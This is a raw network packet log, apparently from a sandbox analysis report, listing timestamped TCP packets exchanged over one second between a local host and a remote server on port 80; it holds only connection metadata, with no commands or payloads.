                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902636051 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902823925 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902842045 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902853966 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902864933 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902877092 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902879000 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902889967 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902903080 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902913094 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902997017 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.903142929 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.903179884 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.903212070 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.903275013 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.903287888 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.903300047 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.903310061 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.903336048 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.903348923 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.903361082 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.903372049 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.903373003 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.903372049 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.903387070 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.903429985 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.903466940 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.903633118 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.903645992 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.903665066 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.903676033 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.903687954 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.903696060 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.903718948 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.903755903 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.973036051 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.973061085 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.973073006 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.973083973 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.973095894 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.973105907 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.973107100 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.973119974 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.973170042 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.973748922 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.973761082 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.973850965 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.974622965 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.974634886 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.974682093 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.974735022 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.974811077 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.974890947 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.974951982 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.974961996 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.974982023 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.974993944 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.975002050 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.975003004 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.975024939 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.975063086 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.975151062 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.975162983 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.975174904 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.975209951 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.975364923 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.975377083 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.975387096 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.975398064 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.975408077 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.975413084 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.975435972 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.975464106 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976366043 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976383924 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976394892 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976404905 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976416111 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976427078 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976432085 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976438046 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976447105 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976450920 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976458073 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976469040 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976494074 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976512909 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976516008 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976527929 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976537943 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976547956 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976572037 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976579905 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976588964 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976599932 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976609945 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976623058 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976629972 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976638079 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976649046 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976660013 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976665020 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976667881 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976670980 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976675987 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976681948 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976696968 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976708889 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976717949 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976728916 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.976759911 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.015175104 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.015201092 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.015211105 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.015235901 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.016875029 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.016899109 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.016910076 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.016952991 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.018963099 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.018992901 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.019004107 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.019015074 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.019045115 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.025908947 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.025926113 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.025938034 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.025948048 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.025958061 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.025968075 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.025995016 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.026006937 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.026015997 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.026017904 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.026030064 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.026031971 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.026041031 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.026051998 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.026062965 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.026072979 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.026082993 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.026084900 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.026104927 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.026115894 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.026127100 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.026138067 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.026143074 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.026150942 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.026180983 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.026230097 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.026278973 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.026295900 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.026308060 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.026316881 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.026340961 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.026355982 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027158022 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027169943 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027180910 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027192116 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027201891 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027209997 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027225971 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027242899 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027245998 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027254105 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027262926 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027264118 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027276039 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027286053 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027296066 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027307034 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027307987 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027338982 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027385950 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027398109 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027407885 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027412891 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027425051 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027439117 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027448893 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027477026 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027659893 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027682066 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027693033 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027703047 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027714014 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027724028 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027724028 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027734995 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027746916 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027757883 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.027796030 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.055664062 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.062310934 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.062334061 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.062350035 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.062386990 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.091398001 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.091424942 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.091455936 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.092112064 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.092153072 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.092160940 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.092170000 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.092206955 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.092725039 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.092741966 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.092791080 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.093497992 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.093513966 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.093528986 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.093553066 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094017982 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094036102 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094057083 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094070911 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094085932 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094100952 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094115019 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094115973 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094130993 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094144106 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094144106 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094158888 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094172955 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094176054 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094202042 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094297886 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094324112 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094336987 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094346046 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094361067 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094374895 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094384909 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094409943 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094424963 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094428062 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094438076 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094453096 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094466925 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094470978 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094481945 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094491005 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094499111 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094521046 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094902992 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094917059 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094933033 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094945908 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.094971895 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.095165968 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.095180035 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.095195055 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.095208883 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.095215082 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.095223904 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.095238924 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.095252037 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.095254898 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.095267057 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.095280886 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.095282078 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.095299006 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.095504999 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.095519066 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.095532894 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.095547915 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.095547915 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.095572948 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.096232891 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.096247911 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.096261978 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.096276045 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.096281052 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.096291065 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.096309900 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.096352100 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.133848906 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.133873940 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.133891106 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.133932114 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.140342951 CET8049957147.45.47.81192.168.2.10
